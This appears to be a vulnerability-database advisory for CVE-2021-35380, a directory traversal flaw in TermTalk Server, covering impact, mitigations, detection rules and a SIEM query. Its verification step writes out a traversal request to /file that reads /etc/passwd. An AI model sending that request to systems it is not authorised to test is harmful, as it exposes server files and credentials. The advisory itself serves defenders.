CVE-2021-35380 – CVE-2021-35380 is a directory traversal vulnera... (How to Fix)

Q: What is the severity of CVE-2021-35380?

CVE-2021-35380 has a CVSS score of 7.5 (HIGH). CVE-2021-35380 is a directory traversal vulnerability in Solari di Udine TermTalk Server that allows unauthenticated attackers to read arbitrary files on the server by manipulating file download requests. This affects TTServer version 3.24.0.2 specifically. Attackers can access sensitive system files without authentication.

📋 TL;DR

CVE-2021-35380 is a directory traversal vulnerability in Solari di Udine TermTalk Server that allows unauthenticated attackers to read arbitrary files on the server by manipulating file download requests. This affects TTServer version 3.24.0.2 specifically. Attackers can access sensitive system files without authentication.

💻 Affected Systems

Products:

Solari di Udine TermTalk Server (TTServer)

Versions: 3.24.0.2

Operating Systems: Windows, Linux

Default Config Vulnerable: ⚠️ Yes

Notes: The vulnerability exists in the file download functionality accessible via HTTP requests to the /file endpoint.

📦 What is this software?

Termtalk Server by Solari

View all CVEs affecting Termtalk Server →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system compromise through reading sensitive files like /etc/passwd, configuration files, or SSH keys, potentially leading to lateral movement or full server takeover.

🟠

Likely Case

Exfiltration of sensitive configuration files, user credentials, or proprietary data from the server.

🟢

If Mitigated

Limited impact if proper network segmentation and access controls prevent external exploitation.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: CONFIRMED

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploit code is publicly available on Exploit-DB (50638), requiring only basic HTTP request manipulation.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: https://www.swascan.com/solari-di-udine/

Restart Required: No

Instructions:

1. Contact Solari di Udine for patch availability. 2. If patch exists, download from vendor. 3. Apply patch according to vendor instructions. 4. Verify fix by testing the vulnerability.

🔧 Temporary Workarounds

Network Access Restriction

linux

Restrict access to TTServer to trusted IP addresses only using firewall rules.

iptables -A INPUT -p tcp --dport [TTSERVER_PORT] -s [TRUSTED_IP] -j ACCEPT
iptables -A INPUT -p tcp --dport [TTSERVER_PORT] -j DROP

Web Server Filtering

all

Implement input validation at the web server level to block directory traversal sequences.

# Configure web server (Apache/Nginx) to filter requests containing ../ or similar patterns

🧯 If You Can't Patch

Implement strict network segmentation to isolate TTServer from sensitive systems.
Deploy a web application firewall (WAF) with directory traversal protection rules.

🔍 How to Verify

Check if Vulnerable:

Test by sending HTTP GET request: http://[target]:[port]/file?valore=../../../etc/passwd and check if file contents are returned.

Check Version:

Check TTServer version in application interface or configuration files; specific command depends on installation.

Verify Fix Applied:

Repeat the test request after applying fixes; it should return an error or empty response instead of file contents.

📡 Detection & Monitoring

Log Indicators:

HTTP requests to /file endpoint with ../ patterns in parameters
Unusual file access patterns from external IPs

Network Indicators:

HTTP GET requests containing directory traversal sequences (../, ..\) to TTServer port

SIEM Query:

source="*ttserver*" AND (uri_path="/file" AND query="*../*")

📊 Metadata

CVE ID: CVE-2021-35380

CVSS v3 Score: 7.5 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CWE: CWE-22

Published: February 15, 2022

Last Updated: November 21, 2024

🔗 References

https://www.exploit-db.com/exploits/50638 Exploit,Third Party Advisory,VDB Entry
https://www.swascan.com/it/security-blog/ Third Party Advisory
https://www.swascan.com/solari-di-udine/ Third Party Advisory
https://www.exploit-db.com/exploits/50638 Exploit,Third Party Advisory,VDB Entry
https://www.swascan.com/it/security-blog/ Third Party Advisory
https://www.swascan.com/solari-di-udine/ Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2021-35380, you might also want to check these: